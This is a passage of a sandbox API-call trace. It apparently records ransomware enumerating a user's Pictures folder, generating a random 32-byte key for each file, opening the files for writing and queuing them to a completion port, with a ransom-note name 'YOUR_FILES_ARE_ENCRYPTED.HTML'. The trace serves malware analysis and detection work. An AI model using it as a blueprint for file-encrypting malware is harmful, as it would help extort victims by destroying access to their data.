pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\iV8-Qr39PzJA__E0\\4nlDuVj.gif") returned 69 [0168.611] lstrcmpW (lpString1="4nlDuVj.gif", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0168.611] 
PathFindExtensionW (pszPath="4nlDuVj.gif") returned=".gif" [0168.611] lstrlenW (lpString=".gif") returned 4 [0168.611] PathFindExtensionW (pszPath="4nlDuVj.gif") returned=".gif" [0168.611] SystemFunction036 (in: RandomBuffer=0x4ebd7ec, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd7ec) returned 1 [0168.611] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\iV8-Qr39PzJA__E0\\4nlDuVj.gif" (normalized: "c:\\users\\5alr3u30d3\\pictures\\c1jo8j6\\iv8-qr39pzja__e0\\4nlduvj.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5b8 [0168.612] GetFileSizeEx (in: hFile=0x5b8, lpFileSize=0x4ebd810 | out: lpFileSize=0x4ebd810*=91378) returned 1 [0168.612] GetProcessHeap () returned 0x270000 [0168.612] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x7690008 [0168.615] wsprintfW (in: param_1=0x4ebd72a, param_2="%02X" | out: param_1="02") returned 2 [0168.616] wsprintfW (in: param_1=0x4ebd72e, param_2="%02X" | out: param_1="D7") returned 2 [0168.616] wsprintfW (in: param_1=0x4ebd732, param_2="%02X" | out: param_1="1D") returned 2 [0168.616] wsprintfW (in: param_1=0x4ebd736, param_2="%02X" | out: param_1="8E") returned 2 [0168.616] wsprintfW (in: param_1=0x4ebd73a, param_2="%02X" | out: param_1="03") returned 2 [0168.616] wsprintfW (in: param_1=0x4ebd73e, param_2="%02X" | out: param_1="D4") returned 2 [0168.616] wsprintfW (in: param_1=0x4ebd742, param_2="%02X" | out: param_1="DD") returned 2 [0168.616] wsprintfW (in: param_1=0x4ebd746, param_2="%02X" | out: param_1="B6") returned 2 [0168.616] wsprintfW (in: param_1=0x4ebd74a, param_2="%02X" | out: param_1="6B") returned 2 [0168.616] wsprintfW (in: param_1=0x4ebd74e, param_2="%02X" | out: param_1="51") returned 2 [0168.616] wsprintfW (in: param_1=0x4ebd752, param_2="%02X" | out: param_1="F5") returned 2 [0168.616] wsprintfW (in: param_1=0x4ebd756, param_2="%02X" | 
out: param_1="B3") returned 2 [0168.616] wsprintfW (in: param_1=0x4ebd75a, param_2="%02X" | out: param_1="6D") returned 2 [0168.616] wsprintfW (in: param_1=0x4ebd75e, param_2="%02X" | out: param_1="86") returned 2 [0168.616] wsprintfW (in: param_1=0x4ebd762, param_2="%02X" | out: param_1="A3") returned 2 [0168.616] wsprintfW (in: param_1=0x4ebd766, param_2="%02X" | out: param_1="B5") returned 2 [0168.616] wsprintfW (in: param_1=0x4ebd76a, param_2="%02X" | out: param_1="F6") returned 2 [0168.616] wsprintfW (in: param_1=0x4ebd76e, param_2="%02X" | out: param_1="1B") returned 2 [0168.616] wsprintfW (in: param_1=0x4ebd772, param_2="%02X" | out: param_1="9C") returned 2 [0168.616] wsprintfW (in: param_1=0x4ebd776, param_2="%02X" | out: param_1="22") returned 2 [0168.616] wsprintfW (in: param_1=0x4ebd77a, param_2="%02X" | out: param_1="A3") returned 2 [0168.616] wsprintfW (in: param_1=0x4ebd77e, param_2="%02X" | out: param_1="4F") returned 2 [0168.616] wsprintfW (in: param_1=0x4ebd782, param_2="%02X" | out: param_1="B4") returned 2 [0168.616] wsprintfW (in: param_1=0x4ebd786, param_2="%02X" | out: param_1="3A") returned 2 [0168.616] wsprintfW (in: param_1=0x4ebd78a, param_2="%02X" | out: param_1="DF") returned 2 [0168.616] wsprintfW (in: param_1=0x4ebd78e, param_2="%02X" | out: param_1="B7") returned 2 [0168.616] wsprintfW (in: param_1=0x4ebd792, param_2="%02X" | out: param_1="DE") returned 2 [0168.616] wsprintfW (in: param_1=0x4ebd796, param_2="%02X" | out: param_1="ED") returned 2 [0168.616] wsprintfW (in: param_1=0x4ebd79a, param_2="%02X" | out: param_1="52") returned 2 [0168.616] wsprintfW (in: param_1=0x4ebd79e, param_2="%02X" | out: param_1="20") returned 2 [0168.616] wsprintfW (in: param_1=0x4ebd7a2, param_2="%02X" | out: param_1="33") returned 2 [0168.617] wsprintfW (in: param_1=0x4ebd7a6, param_2="%02X" | out: param_1="6C") returned 2 [0168.617] lstrcpyW (in: lpString1=0x76a00bc, 
lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\iV8-Qr39PzJA__E0\\4nlDuVj.gif" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\iV8-Qr39PzJA__E0\\4nlDuVj.gif") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\iV8-Qr39PzJA__E0\\4nlDuVj.gif" [0168.617] CreateIoCompletionPort (FileHandle=0x5b8, ExistingCompletionPort=0x3a0, CompletionKey=0x7690008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0168.617] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x7690008, lpOverlapped=0x7690008) returned 1 [0168.632] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xff588e90, ftCreationTime.dwHighDateTime=0x1d7e24a, ftLastAccessTime.dwLowDateTime=0x4aeddb50, ftLastAccessTime.dwHighDateTime=0x1d7e267, ftLastWriteTime.dwLowDateTime=0x4aeddb50, ftLastWriteTime.dwHighDateTime=0x1d7e267, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1c760c2, dwReserved1=0x0, cFileName="91wJYhTsR", cAlternateFileName="91WJYH~1")) returned 1 [0168.632] wnsprintfW (in: pszDest=0x76302f8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\iV8-Qr39PzJA__E0\\91wJYhTsR") returned 67 [0168.632] GetProcessHeap () returned 0x270000 [0168.632] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x7690008 [0168.634] lstrcpyW (in: lpString1=0x7690008, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\iV8-Qr39PzJA__E0\\91wJYhTsR" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\iV8-Qr39PzJA__E0\\91wJYhTsR") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\iV8-Qr39PzJA__E0\\91wJYhTsR" [0168.634] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\iV8-Qr39PzJA__E0\\91wJYhTsR", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\iV8-Qr39PzJA__E0\\91wJYhTsR\\*") 
returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\iV8-Qr39PzJA__E0\\91wJYhTsR\\*" [0168.634] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\iV8-Qr39PzJA__E0\\91wJYhTsR\\*", lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xff588e90, ftCreationTime.dwHighDateTime=0x1d7e24a, ftLastAccessTime.dwLowDateTime=0x4aeddb50, ftLastAccessTime.dwHighDateTime=0x1d7e267, ftLastWriteTime.dwLowDateTime=0x4aeddb50, ftLastWriteTime.dwHighDateTime=0x1d7e267, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xff6c98d4, dwReserved1=0xffffffff, cFileName=".", cAlternateFileName="")) returned 0x42f3200 [0168.634] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xff588e90, ftCreationTime.dwHighDateTime=0x1d7e24a, ftLastAccessTime.dwLowDateTime=0x4aeddb50, ftLastAccessTime.dwHighDateTime=0x1d7e267, ftLastWriteTime.dwLowDateTime=0x4aeddb50, ftLastWriteTime.dwHighDateTime=0x1d7e267, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xff6c98d4, dwReserved1=0xffffffff, cFileName="..", cAlternateFileName="")) returned 1 [0168.635] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4eb98690, ftCreationTime.dwHighDateTime=0x1d7d825, ftLastAccessTime.dwLowDateTime=0xfa86b370, ftLastAccessTime.dwHighDateTime=0x1d7dd21, ftLastWriteTime.dwLowDateTime=0xfa86b370, ftLastWriteTime.dwHighDateTime=0x1d7dd21, nFileSizeHigh=0x0, nFileSizeLow=0x25f6, dwReserved0=0xff6c98d4, dwReserved1=0xffffffff, cFileName="2OyC.png", cAlternateFileName="")) returned 1 [0168.635] wnsprintfW (in: pszDest=0x7690008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\iV8-Qr39PzJA__E0\\91wJYhTsR\\2OyC.png") returned 76 [0168.635] lstrcmpW (lpString1="2OyC.png", 
lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0168.635] PathFindExtensionW (pszPath="2OyC.png") returned=".png" [0168.635] lstrlenW (lpString=".png") returned 4 [0168.635] PathFindExtensionW (pszPath="2OyC.png") returned=".png" [0168.635] SystemFunction036 (in: RandomBuffer=0x4ebd4e0, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd4e0) returned 1 [0168.635] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\iV8-Qr39PzJA__E0\\91wJYhTsR\\2OyC.png" (normalized: "c:\\users\\5alr3u30d3\\pictures\\c1jo8j6\\iv8-qr39pzja__e0\\91wjyhtsr\\2oyc.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5a4 [0168.636] GetFileSizeEx (in: hFile=0x5a4, lpFileSize=0x4ebd504 | out: lpFileSize=0x4ebd504*=9718) returned 1 [0168.636] GetProcessHeap () returned 0x270000 [0168.636] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x73e0048 [0168.640] wsprintfW (in: param_1=0x4ebd41e, param_2="%02X" | out: param_1="8A") returned 2 [0168.640] wsprintfW (in: param_1=0x4ebd422, param_2="%02X" | out: param_1="2B") returned 2 [0168.640] wsprintfW (in: param_1=0x4ebd426, param_2="%02X" | out: param_1="B7") returned 2 [0168.640] wsprintfW (in: param_1=0x4ebd42a, param_2="%02X" | out: param_1="7E") returned 2 [0168.640] wsprintfW (in: param_1=0x4ebd42e, param_2="%02X" | out: param_1="23") returned 2 [0168.640] wsprintfW (in: param_1=0x4ebd432, param_2="%02X" | out: param_1="C5") returned 2 [0168.640] wsprintfW (in: param_1=0x4ebd436, param_2="%02X" | out: param_1="4E") returned 2 [0168.640] wsprintfW (in: param_1=0x4ebd43a, param_2="%02X" | out: param_1="42") returned 2 [0168.640] wsprintfW (in: param_1=0x4ebd43e, param_2="%02X" | out: param_1="60") returned 2 [0168.640] wsprintfW (in: param_1=0x4ebd442, param_2="%02X" | out: param_1="7A") returned 2 [0168.640] wsprintfW (in: param_1=0x4ebd446, param_2="%02X" | out: param_1="D5") 
returned 2 [0168.640] wsprintfW (in: param_1=0x4ebd44a, param_2="%02X" | out: param_1="C7") returned 2 [0168.640] wsprintfW (in: param_1=0x4ebd44e, param_2="%02X" | out: param_1="AE") returned 2 [0168.640] wsprintfW (in: param_1=0x4ebd452, param_2="%02X" | out: param_1="CE") returned 2 [0168.640] wsprintfW (in: param_1=0x4ebd456, param_2="%02X" | out: param_1="17") returned 2 [0168.640] wsprintfW (in: param_1=0x4ebd45a, param_2="%02X" | out: param_1="DD") returned 2 [0168.640] wsprintfW (in: param_1=0x4ebd45e, param_2="%02X" | out: param_1="46") returned 2 [0168.640] wsprintfW (in: param_1=0x4ebd462, param_2="%02X" | out: param_1="0D") returned 2 [0168.640] wsprintfW (in: param_1=0x4ebd466, param_2="%02X" | out: param_1="C9") returned 2 [0168.640] wsprintfW (in: param_1=0x4ebd46a, param_2="%02X" | out: param_1="E4") returned 2 [0168.640] wsprintfW (in: param_1=0x4ebd46e, param_2="%02X" | out: param_1="FE") returned 2 [0168.640] wsprintfW (in: param_1=0x4ebd472, param_2="%02X" | out: param_1="6D") returned 2 [0168.640] wsprintfW (in: param_1=0x4ebd476, param_2="%02X" | out: param_1="FD") returned 2 [0168.640] wsprintfW (in: param_1=0x4ebd47a, param_2="%02X" | out: param_1="4E") returned 2 [0168.640] wsprintfW (in: param_1=0x4ebd47e, param_2="%02X" | out: param_1="8D") returned 2 [0168.640] wsprintfW (in: param_1=0x4ebd482, param_2="%02X" | out: param_1="D1") returned 2 [0168.640] wsprintfW (in: param_1=0x4ebd486, param_2="%02X" | out: param_1="04") returned 2 [0168.640] wsprintfW (in: param_1=0x4ebd48a, param_2="%02X" | out: param_1="0C") returned 2 [0168.641] wsprintfW (in: param_1=0x4ebd48e, param_2="%02X" | out: param_1="CB") returned 2 [0168.641] wsprintfW (in: param_1=0x4ebd492, param_2="%02X" | out: param_1="56") returned 2 [0168.641] wsprintfW (in: param_1=0x4ebd496, param_2="%02X" | out: param_1="45") returned 2 [0168.641] wsprintfW (in: param_1=0x4ebd49a, param_2="%02X" | out: param_1="27") returned 2 [0168.641] lstrcpyW (in: lpString1=0x73f00fc, 
lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\iV8-Qr39PzJA__E0\\91wJYhTsR\\2OyC.png" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\iV8-Qr39PzJA__E0\\91wJYhTsR\\2OyC.png") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\iV8-Qr39PzJA__E0\\91wJYhTsR\\2OyC.png" [0168.641] CreateIoCompletionPort (FileHandle=0x5a4, ExistingCompletionPort=0x3a0, CompletionKey=0x73e0048, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0168.641] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x73e0048, lpOverlapped=0x73e0048) returned 1 [0168.648] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6b61ac80, ftCreationTime.dwHighDateTime=0x1d7e349, ftLastAccessTime.dwLowDateTime=0x81d9dfb0, ftLastAccessTime.dwHighDateTime=0x1d7e59b, ftLastWriteTime.dwLowDateTime=0x81d9dfb0, ftLastWriteTime.dwHighDateTime=0x1d7e59b, nFileSizeHigh=0x0, nFileSizeLow=0x183d5, dwReserved0=0xff6c98d4, dwReserved1=0xffffffff, cFileName="FaEqNR6CU6.gif", cAlternateFileName="FAEQNR~1.GIF")) returned 1 [0168.648] wnsprintfW (in: pszDest=0x7690008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\iV8-Qr39PzJA__E0\\91wJYhTsR\\FaEqNR6CU6.gif") returned 82 [0168.648] lstrcmpW (lpString1="FaEqNR6CU6.gif", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0168.648] PathFindExtensionW (pszPath="FaEqNR6CU6.gif") returned=".gif" [0168.648] lstrlenW (lpString=".gif") returned 4 [0168.648] PathFindExtensionW (pszPath="FaEqNR6CU6.gif") returned=".gif" [0168.648] SystemFunction036 (in: RandomBuffer=0x4ebd4e0, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd4e0) returned 1 [0168.648] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\iV8-Qr39PzJA__E0\\91wJYhTsR\\FaEqNR6CU6.gif" (normalized: 
"c:\\users\\5alr3u30d3\\pictures\\c1jo8j6\\iv8-qr39pzja__e0\\91wjyhtsr\\faeqnr6cu6.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5a4 [0168.649] GetFileSizeEx (in: hFile=0x5a4, lpFileSize=0x4ebd504 | out: lpFileSize=0x4ebd504*=99285) returned 1 [0168.649] GetProcessHeap () returned 0x270000 [0168.649] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x73e0048 [0168.650] wsprintfW (in: param_1=0x4ebd41e, param_2="%02X" | out: param_1="83") returned 2 [0168.650] wsprintfW (in: param_1=0x4ebd422, param_2="%02X" | out: param_1="79") returned 2 [0168.650] wsprintfW (in: param_1=0x4ebd426, param_2="%02X" | out: param_1="E4") returned 2 [0168.650] wsprintfW (in: param_1=0x4ebd42a, param_2="%02X" | out: param_1="33") returned 2 [0168.650] wsprintfW (in: param_1=0x4ebd42e, param_2="%02X" | out: param_1="89") returned 2 [0168.650] wsprintfW (in: param_1=0x4ebd432, param_2="%02X" | out: param_1="DE") returned 2 [0168.650] wsprintfW (in: param_1=0x4ebd436, param_2="%02X" | out: param_1="39") returned 2 [0168.650] wsprintfW (in: param_1=0x4ebd43a, param_2="%02X" | out: param_1="E1") returned 2 [0168.650] wsprintfW (in: param_1=0x4ebd43e, param_2="%02X" | out: param_1="E3") returned 2 [0168.650] wsprintfW (in: param_1=0x4ebd442, param_2="%02X" | out: param_1="C2") returned 2 [0168.650] wsprintfW (in: param_1=0x4ebd446, param_2="%02X" | out: param_1="11") returned 2 [0168.650] wsprintfW (in: param_1=0x4ebd44a, param_2="%02X" | out: param_1="A2") returned 2 [0168.650] wsprintfW (in: param_1=0x4ebd44e, param_2="%02X" | out: param_1="ED") returned 2 [0168.650] wsprintfW (in: param_1=0x4ebd452, param_2="%02X" | out: param_1="66") returned 2 [0168.650] wsprintfW (in: param_1=0x4ebd456, param_2="%02X" | out: param_1="67") returned 2 [0168.650] wsprintfW (in: param_1=0x4ebd45a, param_2="%02X" | out: param_1="27") returned 2 [0168.650] wsprintfW 
(in: param_1=0x4ebd45e, param_2="%02X" | out: param_1="F8") returned 2 [0168.650] wsprintfW (in: param_1=0x4ebd462, param_2="%02X" | out: param_1="15") returned 2 [0168.650] wsprintfW (in: param_1=0x4ebd466, param_2="%02X" | out: param_1="DB") returned 2 [0168.650] wsprintfW (in: param_1=0x4ebd46a, param_2="%02X" | out: param_1="2B") returned 2 [0168.650] wsprintfW (in: param_1=0x4ebd46e, param_2="%02X" | out: param_1="C2") returned 2 [0168.650] wsprintfW (in: param_1=0x4ebd472, param_2="%02X" | out: param_1="01") returned 2 [0168.650] wsprintfW (in: param_1=0x4ebd476, param_2="%02X" | out: param_1="37") returned 2 [0168.650] wsprintfW (in: param_1=0x4ebd47a, param_2="%02X" | out: param_1="F2") returned 2 [0168.651] wsprintfW (in: param_1=0x4ebd47e, param_2="%02X" | out: param_1="AB") returned 2 [0168.651] wsprintfW (in: param_1=0x4ebd482, param_2="%02X" | out: param_1="3B") returned 2 [0168.651] wsprintfW (in: param_1=0x4ebd486, param_2="%02X" | out: param_1="F1") returned 2 [0168.651] wsprintfW (in: param_1=0x4ebd48a, param_2="%02X" | out: param_1="DA") returned 2 [0168.651] wsprintfW (in: param_1=0x4ebd48e, param_2="%02X" | out: param_1="4A") returned 2 [0168.651] wsprintfW (in: param_1=0x4ebd492, param_2="%02X" | out: param_1="B2") returned 2 [0168.651] wsprintfW (in: param_1=0x4ebd496, param_2="%02X" | out: param_1="96") returned 2 [0168.651] wsprintfW (in: param_1=0x4ebd49a, param_2="%02X" | out: param_1="3E") returned 2 [0168.651] lstrcpyW (in: lpString1=0x73f00fc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\iV8-Qr39PzJA__E0\\91wJYhTsR\\FaEqNR6CU6.gif" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\iV8-Qr39PzJA__E0\\91wJYhTsR\\FaEqNR6CU6.gif") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\iV8-Qr39PzJA__E0\\91wJYhTsR\\FaEqNR6CU6.gif" [0168.651] CreateIoCompletionPort (FileHandle=0x5a4, ExistingCompletionPort=0x3a0, CompletionKey=0x73e0048, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0168.651] 
PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x73e0048, lpOverlapped=0x73e0048) returned 1 [0168.655] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5210ff10, ftCreationTime.dwHighDateTime=0x1d7e222, ftLastAccessTime.dwLowDateTime=0xf30a3990, ftLastAccessTime.dwHighDateTime=0x1d7e29f, ftLastWriteTime.dwLowDateTime=0xf30a3990, ftLastWriteTime.dwHighDateTime=0x1d7e29f, nFileSizeHigh=0x0, nFileSizeLow=0xb80d, dwReserved0=0xff6c98d4, dwReserved1=0xffffffff, cFileName="N1gRObBu2tnzgeva.bmp", cAlternateFileName="N1GROB~1.BMP")) returned 1 [0168.658] wnsprintfW (in: pszDest=0x7690008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\iV8-Qr39PzJA__E0\\91wJYhTsR\\N1gRObBu2tnzgeva.bmp") returned 88 [0168.658] lstrcmpW (lpString1="N1gRObBu2tnzgeva.bmp", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0168.658] PathFindExtensionW (pszPath="N1gRObBu2tnzgeva.bmp") returned=".bmp" [0168.658] lstrlenW (lpString=".bmp") returned 4 [0168.658] PathFindExtensionW (pszPath="N1gRObBu2tnzgeva.bmp") returned=".bmp" [0168.658] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdbbfdba0, ftCreationTime.dwHighDateTime=0x1d7e6d7, ftLastAccessTime.dwLowDateTime=0xb590c120, ftLastAccessTime.dwHighDateTime=0x1d7e758, ftLastWriteTime.dwLowDateTime=0xb590c120, ftLastWriteTime.dwHighDateTime=0x1d7e758, nFileSizeHigh=0x0, nFileSizeLow=0xf42f, dwReserved0=0xff6c98d4, dwReserved1=0xffffffff, cFileName="tvjxlZJHorKt41fxL.jpg", cAlternateFileName="TVJXLZ~1.JPG")) returned 1 [0168.658] wnsprintfW (in: pszDest=0x7690008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\iV8-Qr39PzJA__E0\\91wJYhTsR\\tvjxlZJHorKt41fxL.jpg") returned 89 [0168.658] 
lstrcmpW (lpString1="tvjxlZJHorKt41fxL.jpg", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0168.659] PathFindExtensionW (pszPath="tvjxlZJHorKt41fxL.jpg") returned=".jpg" [0168.659] lstrlenW (lpString=".jpg") returned 4 [0168.659] PathFindExtensionW (pszPath="tvjxlZJHorKt41fxL.jpg") returned=".jpg" [0168.659] SystemFunction036 (in: RandomBuffer=0x4ebd4e0, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd4e0) returned 1 [0168.659] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\iV8-Qr39PzJA__E0\\91wJYhTsR\\tvjxlZJHorKt41fxL.jpg" (normalized: "c:\\users\\5alr3u30d3\\pictures\\c1jo8j6\\iv8-qr39pzja__e0\\91wjyhtsr\\tvjxlzjhorkt41fxl.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5a4 [0168.659] GetFileSizeEx (in: hFile=0x5a4, lpFileSize=0x4ebd504 | out: lpFileSize=0x4ebd504*=62511) returned 1 [0168.659] GetProcessHeap () returned 0x270000 [0168.659] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x73e0048 [0168.660] wsprintfW (in: param_1=0x4ebd41e, param_2="%02X" | out: param_1="AE") returned 2 [0168.660] wsprintfW (in: param_1=0x4ebd422, param_2="%02X" | out: param_1="B6") returned 2 [0168.660] wsprintfW (in: param_1=0x4ebd426, param_2="%02X" | out: param_1="D4") returned 2 [0168.660] wsprintfW (in: param_1=0x4ebd42a, param_2="%02X" | out: param_1="69") returned 2 [0168.660] wsprintfW (in: param_1=0x4ebd42e, param_2="%02X" | out: param_1="64") returned 2 [0168.660] wsprintfW (in: param_1=0x4ebd432, param_2="%02X" | out: param_1="AF") returned 2 [0168.660] wsprintfW (in: param_1=0x4ebd436, param_2="%02X" | out: param_1="18") returned 2 [0168.660] wsprintfW (in: param_1=0x4ebd43a, param_2="%02X" | out: param_1="E8") returned 2 [0168.660] wsprintfW (in: param_1=0x4ebd43e, param_2="%02X" | out: param_1="69") returned 2 [0168.660] wsprintfW (in: param_1=0x4ebd442, param_2="%02X" | out: 
param_1="87") returned 2 [0168.660] wsprintfW (in: param_1=0x4ebd446, param_2="%02X" | out: param_1="A3") returned 2 [0168.660] wsprintfW (in: param_1=0x4ebd44a, param_2="%02X" | out: param_1="44") returned 2 [0168.660] wsprintfW (in: param_1=0x4ebd44e, param_2="%02X" | out: param_1="54") returned 2 [0168.660] wsprintfW (in: param_1=0x4ebd452, param_2="%02X" | out: param_1="AF") returned 2 [0168.660] wsprintfW (in: param_1=0x4ebd456, param_2="%02X" | out: param_1="4A") returned 2 [0168.660] wsprintfW (in: param_1=0x4ebd45a, param_2="%02X" | out: param_1="F7") returned 2 [0168.660] wsprintfW (in: param_1=0x4ebd45e, param_2="%02X" | out: param_1="88") returned 2 [0168.660] wsprintfW (in: param_1=0x4ebd462, param_2="%02X" | out: param_1="F1") returned 2 [0168.660] wsprintfW (in: param_1=0x4ebd466, param_2="%02X" | out: param_1="ED") returned 2 [0168.660] wsprintfW (in: param_1=0x4ebd46a, param_2="%02X" | out: param_1="C0") returned 2 [0168.661] wsprintfW (in: param_1=0x4ebd46e, param_2="%02X" | out: param_1="73") returned 2 [0168.661] wsprintfW (in: param_1=0x4ebd472, param_2="%02X" | out: param_1="C3") returned 2 [0168.661] wsprintfW (in: param_1=0x4ebd476, param_2="%02X" | out: param_1="2B") returned 2 [0168.661] wsprintfW (in: param_1=0x4ebd47a, param_2="%02X" | out: param_1="01") returned 2 [0168.661] wsprintfW (in: param_1=0x4ebd47e, param_2="%02X" | out: param_1="04") returned 2 [0168.661] wsprintfW (in: param_1=0x4ebd482, param_2="%02X" | out: param_1="C4") returned 2 [0168.661] wsprintfW (in: param_1=0x4ebd486, param_2="%02X" | out: param_1="51") returned 2 [0168.661] wsprintfW (in: param_1=0x4ebd48a, param_2="%02X" | out: param_1="29") returned 2 [0168.661] wsprintfW (in: param_1=0x4ebd48e, param_2="%02X" | out: param_1="57") returned 2 [0168.661] wsprintfW (in: param_1=0x4ebd492, param_2="%02X" | out: param_1="3B") returned 2 [0168.661] wsprintfW (in: param_1=0x4ebd496, param_2="%02X" | out: param_1="C1") returned 2 [0168.661] wsprintfW (in: 
param_1=0x4ebd49a, param_2="%02X" | out: param_1="53") returned 2 [0168.661] lstrcpyW (in: lpString1=0x73f00fc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\iV8-Qr39PzJA__E0\\91wJYhTsR\\tvjxlZJHorKt41fxL.jpg" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\iV8-Qr39PzJA__E0\\91wJYhTsR\\tvjxlZJHorKt41fxL.jpg") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\iV8-Qr39PzJA__E0\\91wJYhTsR\\tvjxlZJHorKt41fxL.jpg" [0168.661] CreateIoCompletionPort (FileHandle=0x5a4, ExistingCompletionPort=0x3a0, CompletionKey=0x73e0048, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0168.661] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x73e0048, lpOverlapped=0x73e0048) returned 1 [0168.671] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x20, 